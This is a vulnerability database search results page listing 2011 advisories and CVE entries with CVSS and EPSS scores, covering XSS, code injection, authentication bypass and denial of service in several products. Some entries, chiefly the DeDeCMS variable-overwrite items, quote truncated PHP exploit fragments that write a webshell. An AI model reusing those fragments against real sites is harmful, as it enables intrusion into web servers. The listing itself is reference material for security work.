9494 matches found

NVD
added 2011/10/21 10:55 a.m., 6 views

CVE-2009-5103

Cross-site scripting (XSS) vulnerability in ATCOM Netvolution 1.0 ASP allows remote attackers to inject arbitrary web script or HTML via the email variable...

4.3 CVSS, 5.7 AI score, 0.00424 EPSS
Exploits: 1, References: 1

Prion
added 2011/10/21 10:55 a.m., 14 views

Cross site scripting

Cross-site scripting (XSS) vulnerability in ATCOM Netvolution 1.0 ASP allows remote attackers to inject arbitrary web script or HTML via the email variable...

4.3 CVSS, 6.2 AI score, 0.00424 EPSS
Exploits: 1, References: 1, Affected Software: 1

Cvelist
added 2011/10/21 10:0 a.m., 14 views

CVE-2009-5103

Cross-site scripting (XSS) vulnerability in ATCOM Netvolution 1.0 ASP allows remote attackers to inject arbitrary web script or HTML via the email variable...

5.7 AI score, 0.00424 EPSS
Exploits: 1, References: 1

myhack58
added 2011/10/17 12:0 a.m., 19 views

DEDECMS full version gotopage variable XSS ROOTKITS, 0DAY-vulnerability warning-the black bar safety net

Affected versions: DEDECMS full version. Vulnerability description: the gotopage variable in the DEDECMS back-end login template does not validate incoming data, leading to XSS vulnerabilities. \dede\templets\login.htm 6 5 the left and right input type="hidden" name="gotopage" value="? php if!...

1.3 AI score
Exploits: 0

FreeBSD
added 2011/10/17 12:0 a.m., 29 views

asterisk -- remote crash vulnerability in SIP channel driver

Asterisk project reports: A remote authenticated user can cause a crash with a malformed request due to an uninitialized variable...

6.8 CVSS, 6.2 AI score, 0.06434 EPSS
Exploits: 0

Prion
added 2011/10/08 2:52 a.m., 16 views

Code injection

Array index error in GroupWise Internet Agent (GWIA) in Novell GroupWise 8.0 before HP3 allows remote attackers to execute arbitrary code via a crafted yearly RRULE variable in a VCALENDAR attachment in an e-mail message...

10 CVSS, 8.1 AI score, 0.03768 EPSS
Exploits: 0, References: 4, Affected Software: 1

OpenVAS
added 2011/10/04 12:0 a.m., 43 views

Wireshark Multiple Denial of Service Vulnerabilities - Windows

Wireshark is prone to multiple denial of service vulnerabilities. SPDX-FileCopyrightText: 2011 Greenbone AG. Some text descriptions might be excerpted from referenced sources, and are Copyright (C) by the respective right holders. SPDX-License-Identifier: GPL-2.0-only CPE =...

4.3 CVSS, 6.3 AI score, 0.06342 EPSS
Exploits: 2, References: 7

myhack58
added 2011/09/26 12:0 a.m., 19 views

DeDeCMS(weaving dreams)variable overwrite 0day getshell-a vulnerability warning-the black bar safety net

! usr/bin/php-w ? php errorreportingEERROR; settimelimit0; printr' DEDEcms Variable Coverage Exploit Author: www.heixiaozi.com www.webvul.com ; echo "\r\n"; if$argv2==null printr' +---------------------------------------------------------------------------+ Usage: php '.$ argv0.' url aid path aid...

0.3 AI score
Exploits: 0

seebug.org
added 2011/09/24 12:0 a.m., 94 views

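DeDeCMS (织梦) variable overwrite (CVE-2015-4553)

Brief description: 1. Affected versions: DEDECMS 5.7, 5.6, 5.5. 2. Vulnerable file: /include/common.inc.php 3. The global variable initialization in DEDECMS is flawed, allowing arbitrary global variables to be overwritten. Impact: 1. An attacker can use this vulnerability to redefine the database connection. 2. This vulnerability can be used for various privilege-bypass operations, and an exploit can be constructed to write a webshell backdoor directly. !usr/bin/php -w 12 echo " Exploit Success \n"; if$aid==1echo " Shell:".$url."/$path/data/cache/fuck.php\n" ; if$aid==2echo "...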

8.8 AI score, 0.38521 EPSS
Exploits: 6

Tenable Nessus
added 2011/09/23 12:0 a.m., 48 views

CentOS 5 : bash (CESA-2011:1073)

An updated bash package that fixes one security issue, several bugs, and adds one enhancement is now available for Red Hat Enterprise Linux 5. The Red Hat Security Response Team has rated this update as having low security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives...

6.9 CVSS, 5.7 AI score, 0.00054 EPSS
Exploits: 0, References: 5

OpenVAS
added 2011/09/23 12:0 a.m., 21 views

CentOS Update for bash CESA-2011:1073 centos5 i386

Check for the Version of bash. OpenVAS Vulnerability Test: CentOS Update for bash CESA-2011:1073 centos5 i386. Authors: System Generated Check. Copyright: Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net This program is free software; you can redistribute it and/or modify it under t...

6.9 CVSS, 7.6 AI score, 0.00054 EPSS
Exploits: 0, References: 2

Tenable Nessus
added 2011/09/21 12:0 a.m., 13 views

Google Chrome < 14.0.835.163 Multiple Vulnerabilities

Binary data 800955.prm...

7.5 CVSS, 7.3 AI score, 0.12003 EPSS
Exploits: 6, References: 33

Prion
added 2011/08/29 9:55 p.m., 15 views

Denial of service

SystemTap 1.4 and earlier, when unprivileged (aka stapusr) mode is enabled, allows local users to cause a denial of service (divide-by-zero error and OOPS) via a crafted ELF program with DWARF expressions that are not properly handled by a stap script that performs context variable access...

1.2 CVSS, 6.4 AI score, 0.00072 EPSS
Exploits: 0, References: 8, Affected Software: 1

Nmap
added 2011/08/23 6:29 a.m., 737 views

http-joomla-brute NSE Script

Performs brute force password auditing against Joomla web CMS installations. This script initially reads the session cookie and parses the security token to perform the brute force password auditing. It uses the unpwdb and brute libraries to perform password guessing. Any successful guesses are...

10 CVSS, 0.2 AI score, 0.94176 EPSS
Exploits: 33

NVD
added 2011/08/15 7:55 p.m., 11 views

CVE-2011-2907

Terascale Open-Source Resource and Queue Manager (aka TORQUE Resource Manager) 3.0.1 and earlier allows remote attackers to bypass host-based authentication and submit arbitrary jobs via a modified PBS_O_HOST variable to the qsub program...

7.5 CVSS, 7 AI score, 0.00717 EPSS
Exploits: 0, References: 7

UbuntuCve
added 2011/08/15 7:55 p.m., 17 views

CVE-2011-2907

Terascale Open-Source Resource and Queue Manager (aka TORQUE Resource Manager) 3.0.1 and earlier allows remote attackers to bypass host-based authentication and submit arbitrary jobs via a modified PBS_O_HOST variable to the qsub program...

7.5 CVSS, 6 AI score, 0.00717 EPSS
Exploits: 0, References: 2

Prion
added 2011/08/15 7:55 p.m., 9 views

Design/Logic Flaw

Terascale Open-Source Resource and Queue Manager (aka TORQUE Resource Manager) 3.0.1 and earlier allows remote attackers to bypass host-based authentication and submit arbitrary jobs via a modified PBS_O_HOST variable to the qsub program...

7.5 CVSS, 7.5 AI score, 0.00717 EPSS
Exploits: 0, References: 7, Affected Software: 1

CVE
added 2011/08/15 7:0 p.m., 52 views

CVE-2011-2907

TORQUE Resource Manager (Terascale Open-Source Resource and Queue Manager) versions 3.0.1 and earlier are vulnerable to a remote-auth bypass via a modified PBS_O_HOST passed to qsub, enabling submission of arbitrary jobs. This is a remote, unauthenticated issue with potential for privilege escala...

7.5 CVSS, 7.1 AI score, 0.00717 EPSS
Exploits: 0, References: 7, Affected Software: 1

exploitpack
added 2011/08/14 12:0 a.m., 20 views

Prediction Football 2.51 - Cross-Site Request Forgery

Prediction Football 2.51 - Cross-Site Request Forgery Exploit Title: title Google Dork: if relevant intext:"Prediction football 2.51" Date: 08/08/2011 Author: Smith Falcon Software Link: http://www.predictionfootball.com/download/download.html Version: 2.51 Tested on: Linux First create a usernam...

0.8 AI score
Exploits: 0

myhack58
added 2011/08/12 12:0 a.m., 28 views

About Dedecms variable coverage exploits-vulnerability warning-the black bar safety net

Someone recently broke the dedecms variable coverage holes, it is also a quite interesting vulnerability, and in some cases dedecms this variable vulnerability to exist for so long in some people are many years, about six months ago I also independently discovered by this article [email protected] Write ...

0.7 AI score
Exploits: 0